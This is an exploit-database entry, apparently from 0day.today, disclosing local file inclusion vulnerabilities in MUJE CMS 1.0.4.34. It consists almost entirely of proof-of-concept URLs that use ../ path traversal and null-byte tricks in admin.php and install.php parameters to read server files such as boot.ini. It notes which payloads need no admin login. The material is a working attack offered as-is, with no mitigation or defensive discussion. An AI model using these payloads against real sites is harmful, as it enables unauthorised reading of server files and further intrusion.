id: 5583
date: 07/29/2009
title: MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
author: SirGod
cves: 

======================================================
MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
======================================================


####################################################################################
[+] MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
####################################################################################

[+] Download : http://sourceforge.net/projects/mujecms/

[+] Local File Inclusion

 - No admin required

 - PoC's

    http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00

    http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini


 - Admin required

    http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00

####################################################################################




#  0day.today [2023-03-25]  #